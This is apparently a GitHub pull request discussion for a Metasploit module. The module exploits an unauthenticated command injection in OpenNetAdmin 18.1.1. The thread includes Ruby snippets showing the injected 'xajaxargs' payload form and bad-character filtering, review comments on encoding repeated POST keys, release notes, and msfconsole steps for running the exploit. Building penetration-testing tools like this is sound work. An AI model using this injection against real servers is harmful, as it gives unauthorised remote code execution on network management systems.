Add OpenNetAdmin 18.1.1 Remote Code Execution exploit #12704
Conversation
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. This module exploits a command injection in OpenNetAdmin.
Added OpenNetAdmin 18.1.1 Exploit Documentation
```ruby
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
```
Would this make more sense as:

```ruby
cmd.gsub!(/chmod \+x/, 'chmod 777')
CGI.escape cmd
```

to catch all the characters?
Is there a reason to use `data` rather than `vars_post` (which would automatically take care of URL encoding)?
```ruby
vars_post = {
  'xajax' => 'window_submit',
  'xajaxargs[]' => 'tooltips',
  'xajaxargs[]' => "ip%3D%3E;#{filter_bad_chars(cmd)};",
  'xajaxargs[]' => 'ping'
}
```

    warning: key "xajaxargs[]" is duplicated and overwritten

I am encountering the above error.

@bcoles
Unfortunately I don't see a way to handle the repeated key query string paradigm in Rex (PHP will turn it into an array). I'm fine passing as a string (with the payload properly encoded), or you can add array handling to https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L146. Instead of doing a `val.to_s` right away, when `val` is an array I would do something like:

```ruby
# var, val, pstr and opts come from the enclosing parameter loop in client_request.rb
val.each do |v|
  v = v.to_s
  pstr << '&' if pstr.length > 0
  pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
  pstr << '='
  pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
end
```

Then you could pass the post data like:

```ruby
vars_post = {
  'xajax' => 'window_submit',
  'xajaxargs[]' => ['tooltips', "ip=>;#{cmd};", 'ping']
}
```
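As an added example (not the project's or the reviewer's code), the repeated-key encoding sketched above, together with the `CGI.escape` suggestion from the earlier review comment, carried into a stand-alone Ruby encoder and a PHP-style decoder so the round trip can be checked offline. `encode_post_params`, `decode_php_style` and the sample values are assumptions, and `CGI.escape` stands in for Rex's `set_encode_uri`.

```ruby
require 'cgi'

# Added example, not Metasploit's own code: encode a POST body from a
# hash whose values may be scalars or arrays, emitting one key=value
# pair per array element so that a key ending in "[]" (xajaxargs[])
# reaches PHP as an ordered array. CGI.escape stands in for Rex's
# set_encode_uri; encode_params mirrors the Rex option of that name.
def encode_post_params(params, encode_params: true)
  enc = ->(s) { encode_params ? CGI.escape(s.to_s) : s.to_s }
  pairs = []
  params.each do |var, val|
    # Array(val) leaves a scalar as a one-element list
    Array(val).each { |v| pairs << "#{enc.call(var)}=#{enc.call(v)}" }
  end
  pairs.join('&')
end

# Decode a body the way PHP's request parser treats it: a key ending
# in "[]" collects every repeated value into an array, in order, while
# a repeated plain key keeps only the last value.
def decode_php_style(body)
  out = {}
  body.split('&').each do |pair|
    k, v = pair.split('=', 2).map { |s| CGI.unescape(s.to_s) }
    if k.end_with?('[]')
      (out[k[0..-3]] ||= []) << v
    else
      out[k] = v
    end
  end
  out
end

# Constructed sample mirroring the vars_post hash discussed above,
# with a harmless placeholder in place of the injected command.
SAMPLE_PARAMS = {
  'xajax' => 'window_submit',
  'xajaxargs[]' => ['tooltips', 'ip=>;echo ok;', 'ping']
}.freeze

if __FILE__ == $PROGRAM_NAME
  body = encode_post_params(SAMPLE_PARAMS)
  puts body
  p decode_php_style(body)
end
```

A Ruby hash literal with the same key three times keeps only the last value (the warning quoted above), which is why the array form is needed before encoding.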
There's inconsistency with the naming convention here.
It looks like OpenNetAdmin is a typical LAMP stack style application, which should run on any UNIX system. In which case the module belongs in
Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>
documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
… to modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
…in_ping_cmd_injection.md to documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md
handle the repeated key query rapid7#12704 (comment)
Handle the repeated key query string rapid7#12704 (comment)
Thanks for your contribution! I just have a few comments and questions before it lands.
documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md
modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
…d_injection.md Co-Authored-By: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
Co-Authored-By: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
@onurer, thanks again for this contribution! I just pushed a last commit to fix an indentation issue. Not a big deal.
Release Notes

This module allows you to exploit a command injection vulnerability in OpenNetAdmin 18.1.1, a network management application for managing IP subnets, and remotely execute commands. You don't need to authenticate to exploit this vulnerability.
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
This module exploits a command injection in OpenNetAdmin.
Verification

Launch metasploit and set the appropriate options:

```
msfconsole
use exploit/linux/http/opennetadmin_ping_cmd_injection
set RHOSTS <rhosts>
set LHOST <lhost>
set VHOST <hostname>
exploit
```